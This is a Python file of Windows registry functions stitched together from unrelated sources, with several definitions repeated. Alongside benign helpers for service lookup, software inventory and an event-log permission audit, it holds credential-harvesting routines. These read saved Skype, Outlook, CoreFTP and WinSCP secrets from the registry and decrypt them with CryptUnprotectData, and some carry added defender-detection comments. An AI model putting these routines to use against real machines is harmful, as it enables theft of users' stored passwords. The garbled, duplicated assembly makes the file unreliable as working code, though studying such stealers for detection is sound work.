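def _GetServiceShortName(longName):
    """Return the registry (short) name of the service whose DisplayName is *longName*.

    Enumerates the subkeys of HKLM\\SYSTEM\\CurrentControlSet\\Services and
    compares each one's "DisplayName" value with *longName* case-insensitively.
    Thanks to Andy McKay for the original code.

    Args:
        longName: the display name to look up (compared after .lower()).

    Returns:
        The subkey (service) name of the first match, or None if no service
        carries that display name.

    Raises:
        win32api.error only when the Services key itself cannot be opened.
        Per-service problems — a subkey that cannot be opened, or one without
        a DisplayName value — skip that service; the original let an error
        from RegOpenKey on a single subkey abort the whole lookup.

    All handles are closed with RegCloseKey on every exit path.
    """
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    try:
        num = win32api.RegQueryInfoKey(hkey)[0]  # [0] = number of subkeys
        wanted = longName.lower()
        for x in range(num):
            svc = win32api.RegEnumKey(hkey, x)
            try:
                skey = win32api.RegOpenKey(hkey, svc, 0, access)
            except win32api.error:
                # subkey not readable for this caller: skip it, do not abort
                continue
            try:
                # str() so a non-string value type still compares safely
                thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
                if thisName.lower() == wanted:
                    return svc
            except win32api.error:
                # no DisplayName value on this service key
                pass
            finally:
                win32api.RegCloseKey(skey)
        return None
    finally:
        win32api.RegCloseKey(hkey)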
# Open a service given either its long or short name.
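def _GetServiceShortName(longName):
    """Return the registry (short) name of the service whose DisplayName is *longName*.

    Enumerates the subkeys of HKLM\\SYSTEM\\CurrentControlSet\\Services and
    compares each one's "DisplayName" value with *longName* case-insensitively.
    Thanks to Andy McKay for the original code.

    Args:
        longName: the display name to look up (compared after .lower()).

    Returns:
        The subkey (service) name of the first match, or None if no service
        carries that display name.

    Raises:
        win32api.error only when the Services key itself cannot be opened.
        Per-service problems — a subkey that cannot be opened, or one without
        a DisplayName value — skip that service; the original let an error
        from RegOpenKey on a single subkey abort the whole lookup.

    All handles are closed with RegCloseKey on every exit path.
    """
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    try:
        num = win32api.RegQueryInfoKey(hkey)[0]  # [0] = number of subkeys
        wanted = longName.lower()
        for x in range(num):
            svc = win32api.RegEnumKey(hkey, x)
            try:
                skey = win32api.RegOpenKey(hkey, svc, 0, access)
            except win32api.error:
                # subkey not readable for this caller: skip it, do not abort
                continue
            try:
                # str() so a non-string value type still compares safely
                thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
                if thisName.lower() == wanted:
                    return svc
            except win32api.error:
                # no DisplayName value on this service key
                pass
            finally:
                win32api.RegCloseKey(skey)
        return None
    finally:
        win32api.RegCloseKey(hkey)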
# Open a service given either its long or short name.
def get_regkey(self):
    # Return the DPAPI-unprotected data of the first value stored under
    # HKCU\Software\Skype\ProtectedStorage.
    #
    # Returns:
    #   the data part of CryptUnprotectData(...) when the key opens and
    #   RegEnumValue(hkey, 0) yields a value;
    #   '' when the ProtectedStorage key cannot be opened (the exception is
    #   printed first);
    #   'failed' for any other exception, e.g. RegEnumValue raising on a key
    #   that holds no values (also printed).
    #   If RegEnumValue ever returned something falsy the method would fall
    #   off the end and return None; a tuple never is, so that path is not
    #   expected.
    #
    # Python 2 syntax (except X, e / print statement): does not compile on
    # Python 3.  The opened handle is never closed explicitly.
    #
    # Defender note: a process other than Skype opening this key and then
    # calling CryptUnprotectData is a credential-access indicator.
    try:
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Skype\\ProtectedStorage'
        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            print e
            return ''
        # value count: queried but never used
        num = win32api.RegQueryInfoKey(hkey)[1]
        k = win32api.RegEnumValue(hkey, 0)
        if k:
            key = k[1]  # value data: the DPAPI-protected blob
            return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
    except Exception, e:
        print e
        return 'failed'
# get hash from configuration file
def retrieve_info(self, hkey, name_key):
    # Collect every value under the already-open key *hkey* into a dict.
    #
    # Args:
    #   hkey: an open registry key handle; the caller owns it and it is not
    #         closed here.
    #   name_key: unused.
    #
    # Returns:
    #   {value_name: text}.  A value whose name contains "password" is
    #   treated as a DPAPI blob: its first byte is dropped, the remainder is
    #   passed to CryptUnprotectData and the result decoded as UTF-16; 'N/A'
    #   is stored if any of that fails.  Every other value is str()-ed and
    #   decoded as UTF-16, falling back to the plain str() form when the
    #   decode raises (bare except — catches everything).
    #
    # Python 2 syntax (except X, e; str.decode): does not run on Python 3.
    #
    # Defender note: CryptUnprotectData applied to password-named registry
    # values is a credential-access indicator.
    values = {}
    num = win32api.RegQueryInfoKey(hkey)[1]  # [1] = number of values
    for x in range(0, num):
        k = win32api.RegEnumValue(hkey, x)  # k[0] = value name, k[1] = data
        if 'password' in k[0].lower():
            try:
                # k[1][1:] assumes a one-byte prefix before the DPAPI blob —
                # a layout assumption not verified here; TODO confirm
                password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
                values[k[0]] = password.decode('utf16')
            except Exception, e:
                values[k[0]] = 'N/A'
        else:
            try:
                values[k[0]] = str(k[1]).decode('utf16')
            except:
                values[k[0]] = str(k[1])
    return values
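def _GetServiceShortName(longName):
    """Return the registry (short) name of the service whose DisplayName is *longName*.

    Enumerates the subkeys of HKLM\\SYSTEM\\CurrentControlSet\\Services and
    compares each one's "DisplayName" value with *longName* case-insensitively.
    Thanks to Andy McKay for the original code.

    Args:
        longName: the display name to look up (compared after .lower()).

    Returns:
        The subkey (service) name of the first match, or None if no service
        carries that display name.

    Raises:
        win32api.error only when the Services key itself cannot be opened.
        Per-service problems — a subkey that cannot be opened, or one without
        a DisplayName value — skip that service; the original let an error
        from RegOpenKey on a single subkey abort the whole lookup.

    All handles are closed with RegCloseKey on every exit path.
    """
    access = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    hkey = win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, access)
    try:
        num = win32api.RegQueryInfoKey(hkey)[0]  # [0] = number of subkeys
        wanted = longName.lower()
        for x in range(num):
            svc = win32api.RegEnumKey(hkey, x)
            try:
                skey = win32api.RegOpenKey(hkey, svc, 0, access)
            except win32api.error:
                # subkey not readable for this caller: skip it, do not abort
                continue
            try:
                # str() so a non-string value type still compares safely
                thisName = str(win32api.RegQueryValueEx(skey, "DisplayName")[0])
                if thisName.lower() == wanted:
                    return svc
            except win32api.error:
                # no DisplayName value on this service key
                pass
            finally:
                win32api.RegCloseKey(skey)
        return None
    finally:
        win32api.RegCloseKey(hkey)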
# Open a service given either its long or short name.
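def get_user_paths():
    """Return the per-user PATH values found under HKEY_USERS.

    For every hive under HKEY_USERS, opens <hive>\\Environment and reads its
    "PATH" value.

    Returns:
        A list of (hive_name, path) tuples — empty when no hive exposes a
        user-level PATH.  Returns 0 (not a list) when HKEY_USERS itself cannot
        be opened; that value is kept for compatibility with existing callers,
        so test the result with ``== 0`` rather than truthiness.

    Hives whose Environment key cannot be opened, or which have no PATH value,
    are skipped.  Only win32api.error is caught; the original bare ``except``
    clauses also hid programming errors.  Handles are closed on every path.
    """
    read_access = win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ
    try:
        keyh = win32api.RegOpenKeyEx(win32con.HKEY_USERS, None, 0, read_access)
    except win32api.error:
        return 0
    paths = []
    try:
        for subkey in win32api.RegEnumKeyEx(keyh):
            hive_name = subkey[0]
            try:
                subkeyh = win32api.RegOpenKeyEx(keyh, hive_name + "\\Environment", 0, read_access)
            except win32api.error:
                # no Environment key for this hive, or not readable by us
                continue
            try:
                path, _value_type = win32api.RegQueryValueEx(subkeyh, "PATH")
            except win32api.error:
                # this user has no user-level PATH
                pass
            else:
                paths.append((hive_name, path))
            finally:
                win32api.RegCloseKey(subkeyh)
    finally:
        win32api.RegCloseKey(keyh)
    return paths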
def get_regkey(self):
    # Return the DPAPI-unprotected data of the first value stored under
    # HKCU\Software\Skype\ProtectedStorage.
    #
    # Returns:
    #   the data part of CryptUnprotectData(...) when the key opens and
    #   RegEnumValue(hkey, 0) yields a value;
    #   '' when the ProtectedStorage key cannot be opened;
    #   'failed' for any other exception, e.g. RegEnumValue raising on a key
    #   that holds no values.  (The "print e" lines are commented out in
    #   this copy, so errors are silent.)
    #   If RegEnumValue ever returned something falsy the method would fall
    #   off the end and return None; a tuple never is, so that path is not
    #   expected.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.  The
    # opened handle is never closed explicitly.
    #
    # Defender note: a process other than Skype opening this key and then
    # calling CryptUnprotectData is a credential-access indicator.
    try:
        accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
        keyPath = 'Software\\Skype\\ProtectedStorage'
        try:
            hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
        except Exception, e:
            # print e
            return ''
        # value count: queried but never used
        num = win32api.RegQueryInfoKey(hkey)[1]
        k = win32api.RegEnumValue(hkey, 0)
        if k:
            key = k[1]  # value data: the DPAPI-protected blob
            return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
    except Exception, e:
        # print e
        return 'failed'
# get hash from configuration file
def retrieve_info(self, hkey, name_key):
    # Collect every value under the already-open key *hkey* into a dict.
    #
    # Args:
    #   hkey: an open registry key handle; the caller owns it and it is not
    #         closed here.
    #   name_key: unused.
    #
    # Returns:
    #   {value_name: text}.  A value whose name contains "password" is
    #   treated as a DPAPI blob: its first byte is dropped, the remainder is
    #   passed to CryptUnprotectData and the result decoded as UTF-16; 'N/A'
    #   is stored if any of that fails.  Every other value is str()-ed and
    #   decoded as UTF-16, falling back to the plain str() form when the
    #   decode raises (bare except — catches everything).
    #
    # Python 2 syntax (except X, e; str.decode): does not run on Python 3.
    #
    # Defender note: CryptUnprotectData applied to password-named registry
    # values is a credential-access indicator.
    values = {}
    num = win32api.RegQueryInfoKey(hkey)[1]  # [1] = number of values
    for x in range(0, num):
        k = win32api.RegEnumValue(hkey, x)  # k[0] = value name, k[1] = data
        if 'password' in k[0].lower():
            try:
                # k[1][1:] assumes a one-byte prefix before the DPAPI blob —
                # a layout assumption not verified here; TODO confirm
                password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1]
                values[k[0]] = password.decode('utf16')
            except Exception, e:
                values[k[0]] = 'N/A'
        else:
            try:
                values[k[0]] = str(k[1]).decode('utf16')
            except:
                values[k[0]] = str(k[1])
    return values
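def getSoftwareList(self):
    """Report installed software found under the uninstall registry tree.

    Walks every subkey of self.CONST_SW_SUBKEY under self.HKEY_LOCAL_MACHINE
    and reports each key's "DisplayName" and "DisplayVersion" values through
    self.preparefile("SW Name", ...) and self.preparefile("SW Version", ...).

    Any exception is reported once via preparefile("Exception", ...) and
    swallowed, so this method never raises to its caller.

    Keys are opened with KEY_READ.  The original requested KEY_ALL_ACCESS,
    which needs write rights on HKLM; for a non-elevated process the open
    failed and the whole enumeration was reported as an exception.  The
    unused RegConnectRegistry / GetComputerName / GetDomainName calls (their
    results fed only commented-out code) are dropped, and every handle is
    closed in a ``finally``.
    """
    try:
        hHandle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE, self.CONST_SW_SUBKEY, 0, win32con.KEY_READ)
        try:
            subkey_count = win32api.RegQueryInfoKey(hHandle)[0]  # [0] = number of subkeys
            for i in range(subkey_count):
                hAppName = win32api.RegEnumKey(hHandle, i)
                hPath = self.CONST_SW_SUBKEY + "\\" + hAppName
                hOpenApp = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE, hPath, 0, win32con.KEY_READ)
                try:
                    value_count = win32api.RegQueryInfoKey(hOpenApp)[1]  # [1] = number of values
                    for j in range(value_count):
                        hData = win32api.RegEnumValue(hOpenApp, j)
                        if hData[0] == "DisplayName":
                            self.preparefile("SW Name", hData[1])
                        elif hData[0] == "DisplayVersion":
                            self.preparefile("SW Version", hData[1])
                finally:
                    win32api.RegCloseKey(hOpenApp)
        finally:
            win32api.RegCloseKey(hHandle)
    except Exception:
        # best-effort reporting, as in the original; KeyboardInterrupt now propagates
        self.preparefile("Exception", "In exception in getSoftwareList")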
def IsExpandable(self):
    """Tell the tree view that this registry-key node can be expanded.

    Always answers 1: every key is presented as expandable even when it has
    no children yet.  An earlier variant (left commented out by the original
    author) opened the key and counted its subkeys with RegQueryInfoKey; the
    constant answer avoids that per-node registry access.
    """
    return 1
def get_key_info(self):
    # Enumerate saved CoreFTP site profiles under
    # HKCU\Software\FTPware\CoreFTP\Sites.
    #
    # Returns:
    #   False when the Sites key cannot be opened; otherwise a list with one
    #   dict per profile carrying 'Host', 'Port', 'User' and 'Password'
    #   (self.decrypt(k[1]) applied to the 'PW' value, 'N/A' if that raises).
    #   self.decrypt is defined elsewhere.
    #
    # A profile's dict is appended only when a 'User' value is encountered,
    # so a profile without one is silently dropped.  Because the same dict
    # object is mutated for every value of the profile, the 'Password' entry
    # still lands in the returned dict whether 'PW' is enumerated before or
    # after 'User'.  Key handles are never closed explicitly.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.
    #
    # Defender note: reads of this key path by a process other than CoreFTP
    # are a credential-access indicator.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
    except Exception, e:
        return False
    num_profiles = win32api.RegQueryInfoKey(key)[0]  # [0] = number of subkeys
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        num = win32api.RegQueryInfoKey(skey)[1]  # [1] = number of values
        values = {}
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)  # k[0] = value name, k[1] = data
            if k[0] == 'Host':
                values['Host'] = k[1]
            if k[0] == 'Port':
                values['Port'] = k[1]
            if k[0] == 'User':
                values['User'] = k[1]
                # the shared dict is appended here; later entries still show up
                pwdFound.append(values)
            if k[0] == 'PW':
                try:
                    values['Password'] = self.decrypt(k[1])
                except Exception, e:
                    values['Password'] = 'N/A'
    # return the results (the caller does any printing)
    return pwdFound
def run(self):
    # Walk the Outlook profile tree under HKCU\Software\Microsoft\Windows NT\
    # CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook three
    # levels deep: profile key -> sub-key -> values.
    #
    # Returns:
    #   None (implicit) when the Profiles\Outlook key cannot be opened;
    #   otherwise a list of the dicts produced by self.retrieve_info(),
    #   one per (sub-key, value whose name contains "password") pair — a
    #   sub-key holding two such values is collected twice.  Empty dicts
    #   are skipped.
    #
    # The "if num_skey != 0" guard is redundant (range(0, 0) is empty).
    # None of the opened handles are closed explicitly.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.
    #
    # Defender note: enumeration of this key path by a process other than
    # Outlook is a credential-access indicator.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except Exception, e:
        return
    num = win32api.RegQueryInfoKey(hkey)[0]  # [0] = number of profile subkeys
    pwdFound = []
    for x in range(0, num):
        name = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
        num_skey = win32api.RegQueryInfoKey(skey)[0]
        if num_skey != 0:
            for y in range(0, num_skey):
                name_skey = win32api.RegEnumKey(skey, y)
                sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                num_sskey = win32api.RegQueryInfoKey(sskey)[1]  # [1] = number of values
                for z in range(0, num_sskey):
                    k = win32api.RegEnumValue(sskey, z)  # k[0] = value name
                    if 'password' in k[0].lower():
                        values = self.retrieve_info(sskey, name_skey)
                        # collect in memory only; nothing is written to disk here
                        if len(values) != 0:
                            pwdFound.append(values)
    # return the results (the caller does any printing)
    return pwdFound
def IsExpandable(self):
    """Tell the tree view that this registry-key node can be expanded.

    Always answers 1: every key is presented as expandable even when it has
    no children yet.  An earlier variant (left commented out by the original
    author) opened the key and counted its subkeys with RegQueryInfoKey; the
    constant answer avoids that per-node registry access.
    """
    return 1
def get_logins_info(self):
    # Enumerate WinSCP saved sessions under
    # HKCU\Software\Martin Prikryl\WinSCP 2\Sessions.
    #
    # Returns:
    #   False when the Sessions key cannot be opened; otherwise a list of
    #   dicts with 'Hostname', 'Port' (a string, '22' when no PortNumber
    #   value exists), 'Username' and — only when self.decrypt_password()
    #   succeeds — 'Password'.  A session sub-key with no values at all is
    #   skipped.
    #
    # Per-session values are pushed through self.set_hostname /
    # set_username / set_hash and read back with self.get_hostname /
    # get_username (all defined elsewhere).  Since that state lives on self
    # and is only overwritten when the value is present, a session lacking
    # HostName or UserName presumably reports the previous session's value —
    # verify against the getters.  Key handles are never closed explicitly.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.
    #
    # Defender note: reads of this key path by a process other than WinSCP
    # are a credential-access indicator.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        # non-raw string with single backslashes: '\M', '\W' and '\S' are not
        # escape sequences so the path is read literally (Python 3 warns)
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
        accessRead)
    except Exception, e:
        return False
    num_profiles = win32api.RegQueryInfoKey(key)[0]  # [0] = number of session subkeys
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        num = win32api.RegQueryInfoKey(skey)[1]  # [1] = number of values
        port = ''
        values = {}
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)  # k[0] = value name, k[1] = data
            if k[0] == 'HostName':
                self.set_hostname(k[1])
            if k[0] == 'UserName':
                self.set_username(k[1])
            if k[0] == 'Password':
                self.set_hash(k[1])
            if k[0] == 'PortNumber':
                port = str(k[1])
        if num != 0:
            if port == '':
                port = '22'  # default when the session stores no PortNumber
            try:
                password = self.decrypt_password()
                values['Password'] = password
            except Exception, e:
                pass  # decryption failure: session is still reported, without 'Password'
            values['Hostname'] = self.get_hostname()
            values['Port'] = port
            values['Username'] = self.get_username()
            pwdFound.append(values)
    # return the results (the caller does any printing)
    return pwdFound
def get_key_info(self):
    # Enumerate saved CoreFTP site profiles under
    # HKCU\Software\FTPware\CoreFTP\Sites.
    #
    # Returns:
    #   False when the Sites key cannot be opened; otherwise a list with one
    #   dict per profile carrying 'Host', 'Port', 'User' and 'Password'
    #   (self.decrypt(k[1]) applied to the 'PW' value, 'N/A' if that raises).
    #   self.decrypt is defined elsewhere.
    #
    # A profile's dict is appended only when a 'User' value is encountered,
    # so a profile without one is silently dropped.  Because the same dict
    # object is mutated for every value of the profile, the 'Password' entry
    # still lands in the returned dict whether 'PW' is enumerated before or
    # after 'User'.  Key handles are never closed explicitly.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.
    #
    # Defender note: reads of this key path by a process other than CoreFTP
    # are a credential-access indicator.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
    except Exception, e:
        return False
    num_profiles = win32api.RegQueryInfoKey(key)[0]  # [0] = number of subkeys
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        num = win32api.RegQueryInfoKey(skey)[1]  # [1] = number of values
        values = {}
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)  # k[0] = value name, k[1] = data
            if k[0] == 'Host':
                values['Host'] = k[1]
            if k[0] == 'Port':
                values['Port'] = k[1]
            if k[0] == 'User':
                values['User'] = k[1]
                # the shared dict is appended here; later entries still show up
                pwdFound.append(values)
            if k[0] == 'PW':
                try:
                    values['Password'] = self.decrypt(k[1])
                except Exception, e:
                    values['Password'] = 'N/A'
    # return the results (the caller does any printing)
    return pwdFound
def run(self):
    # Walk the Outlook profile tree under HKCU\Software\Microsoft\Windows NT\
    # CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook three
    # levels deep: profile key -> sub-key -> values.
    #
    # Returns:
    #   None (implicit) when the Profiles\Outlook key cannot be opened;
    #   otherwise a list of the dicts produced by self.retrieve_info(),
    #   one per (sub-key, value whose name contains "password") pair — a
    #   sub-key holding two such values is collected twice.  Empty dicts
    #   are skipped.
    #
    # The "if num_skey != 0" guard is redundant (range(0, 0) is empty).
    # None of the opened handles are closed explicitly.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.
    #
    # Defender note: enumeration of this key path by a process other than
    # Outlook is a credential-access indicator.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except Exception, e:
        return
    num = win32api.RegQueryInfoKey(hkey)[0]  # [0] = number of profile subkeys
    pwdFound = []
    for x in range(0, num):
        name = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, name, 0, accessRead)
        num_skey = win32api.RegQueryInfoKey(skey)[0]
        if num_skey != 0:
            for y in range(0, num_skey):
                name_skey = win32api.RegEnumKey(skey, y)
                sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                num_sskey = win32api.RegQueryInfoKey(sskey)[1]  # [1] = number of values
                for z in range(0, num_sskey):
                    k = win32api.RegEnumValue(sskey, z)  # k[0] = value name
                    if 'password' in k[0].lower():
                        values = self.retrieve_info(sskey, name_skey)
                        # collect in memory only; nothing is written to disk here
                        if len(values) != 0:
                            pwdFound.append(values)
    # return the results (the caller does any printing)
    return pwdFound
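def getSysInfo(self):
    """Report processor, machine, user and OS identification via preparefile().

    Reads the "Identifier" value under self.CONST_PROC_SUBKEY and the
    "ProductName" / "CSDVersion" values under self.CONST_OS_SUBKEY (both
    under self.HKEY_LOCAL_MACHINE), plus the computer, domain and user names
    from win32api, and passes each through self.preparefile() in that order.
    A missing or empty value is reported with a "could not be read" /
    "Cannot be determined" message instead of being skipped.

    Any exception is reported once through preparefile("Exception", ...) and
    swallowed, so the method never raises.

    Changes from the original: keys are opened read-only (KEY_READ — the
    KEY_ALL_ACCESS request fails for non-elevated processes on HKLM, which
    turned every run by an ordinary user into the exception message); the
    stray ``print "debug1"`` is gone; each key is enumerated once instead of
    twice; handles are closed; and the exception message names this method
    (it referred to a "getSysDetails" that does not exist).
    """
    def read_values(subkey_path):
        # Return {value name: data} for every value directly under
        # HKLM\subkey_path; the handle is closed before returning.
        handle = win32api.RegOpenKeyEx(self.HKEY_LOCAL_MACHINE, subkey_path, 0, win32con.KEY_READ)
        try:
            found = {}
            for i in range(win32api.RegQueryInfoKey(handle)[1]):  # [1] = number of values
                hData = win32api.RegEnumValue(handle, i)
                found[hData[0]] = hData[1]
            return found
        finally:
            win32api.RegCloseKey(handle)

    try:
        hProcessorName = read_values(self.CONST_PROC_SUBKEY).get("Identifier", "")
        if hProcessorName == "":
            hProcessorName = "Processor Name Cannot be determined"
        self.preparefile("Processor Name", hProcessorName)
        self.preparefile("Computer Name", win32api.GetComputerName())
        self.preparefile("Domain Name", win32api.GetDomainName())
        self.preparefile("User Name", win32api.GetUserName())

        os_values = read_values(self.CONST_OS_SUBKEY)
        hOSName = os_values.get("ProductName", "")
        if hOSName == "":
            self.preparefile("OS Name", "OS Name could not be read from the registry")
        else:
            self.preparefile("OS Name", hOSName)
        hOSVersion = os_values.get("CSDVersion", "")
        if hOSVersion == "":
            self.preparefile("OS Version", "OS Version could not be read from the registry")
        else:
            self.preparefile("OS Version", hOSVersion)
    except Exception:
        # best-effort reporting, as in the original; KeyboardInterrupt now propagates
        self.preparefile("Exception", "in Exception in getSysInfo")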
def get_logins_info(self):
    # Enumerate WinSCP saved sessions under
    # HKCU\Software\Martin Prikryl\WinSCP 2\Sessions.
    #
    # Returns:
    #   False when the Sessions key cannot be opened; otherwise a list of
    #   dicts with 'Hostname', 'Port' (a string, '22' when no PortNumber
    #   value exists), 'Username' and — only when self.decrypt_password()
    #   succeeds — 'Password'.  A session sub-key with no values at all is
    #   skipped.
    #
    # Per-session values are pushed through self.set_hostname /
    # set_username / set_hash and read back with self.get_hostname /
    # get_username (all defined elsewhere).  Since that state lives on self
    # and is only overwritten when the value is present, a session lacking
    # HostName or UserName presumably reports the previous session's value —
    # verify against the getters.  Key handles are never closed explicitly.
    #
    # Python 2 syntax (except X, e): does not compile on Python 3.
    #
    # Defender note: reads of this key path by a process other than WinSCP
    # are a credential-access indicator.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        # non-raw string with single backslashes: '\M', '\W' and '\S' are not
        # escape sequences so the path is read literally (Python 3 warns)
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0,
        accessRead)
    except Exception, e:
        return False
    num_profiles = win32api.RegQueryInfoKey(key)[0]  # [0] = number of session subkeys
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        num = win32api.RegQueryInfoKey(skey)[1]  # [1] = number of values
        port = ''
        values = {}
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)  # k[0] = value name, k[1] = data
            if k[0] == 'HostName':
                self.set_hostname(k[1])
            if k[0] == 'UserName':
                self.set_username(k[1])
            if k[0] == 'Password':
                self.set_hash(k[1])
            if k[0] == 'PortNumber':
                port = str(k[1])
        if num != 0:
            if port == '':
                port = '22'  # default when the session stores no PortNumber
            try:
                password = self.decrypt_password()
                values['Password'] = password
            except Exception, e:
                pass  # decryption failure: session is still reported, without 'Password'
            values['Hostname'] = self.get_hostname()
            values['Port'] = port
            values['Username'] = self.get_username()
            pwdFound.append(values)
    # return the results (the caller does any printing)
    return pwdFound
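def check_event_logs():
    """Audit the event-log registry configuration for weakly-protected backing files.

    Opens HKLM\\<eventlog_key_hklm> and, for each log subkey, checks the file
    named by its "DisplayNameFile" value and by its "File" value with
    check_weak_write_perms(); a weak ACL is recorded through save_issue() as
    WPC008 ("writable_eventlog_dll") or WPC007 ("writable_eventlog_file").
    Writes one "." per subkey and one "!" per finding to stdout as progress
    output, followed by a newline.

    Returns:
        0 when the top-level key cannot be opened (the failure is printed);
        otherwise None.

    eventlog_key_hklm, check_weak_write_perms and save_issue are module-level
    names defined elsewhere in the file.  Only win32api.error is caught (the
    original bare ``except`` clauses also hid programming errors), the
    "Can't open" message for a subkey now names that subkey rather than the
    parent key, and every handle is closed in a ``finally``.
    """
    read_access = win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE | win32con.KEY_READ
    key_string = "HKEY_LOCAL_MACHINE\\" + eventlog_key_hklm
    try:
        keyh = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, eventlog_key_hklm, 0, read_access)
    except win32api.error:
        print("Can't open: " + key_string)
        return 0

    def check_file_value(subkeyh, value_name, issue_id, issue_name):
        # Flag the file named by value_name (after %VAR% expansion) when its
        # write permissions are weak; a missing value is not a finding.
        try:
            filename, _value_type = win32api.RegQueryValueEx(subkeyh, value_name)
        except win32api.error:
            return
        weak_perms = check_weak_write_perms(os.path.expandvars(filename), 'file')
        if weak_perms:
            sys.stdout.write("!")
            save_issue(issue_id, issue_name, weak_perms)

    try:
        for subkey in win32api.RegEnumKeyEx(keyh):
            sys.stdout.write(".")
            try:
                subkeyh = win32api.RegOpenKeyEx(keyh, subkey[0], 0, read_access)
            except win32api.error:
                print("Can't open: " + key_string + "\\" + subkey[0])
                continue
            try:
                check_file_value(subkeyh, "DisplayNameFile", "WPC008", "writable_eventlog_dll")
                check_file_value(subkeyh, "File", "WPC007", "writable_eventlog_file")
            finally:
                win32api.RegCloseKey(subkeyh)
    finally:
        win32api.RegCloseKey(keyh)
    sys.stdout.write("\n")
    # TODO: also inspect each subkey's own DACL and owner (RegGetKeySecurity
    # with DACL_SECURITY_INFORMATION), so a writable registry entry — not
    # just a writable file — is reported as well.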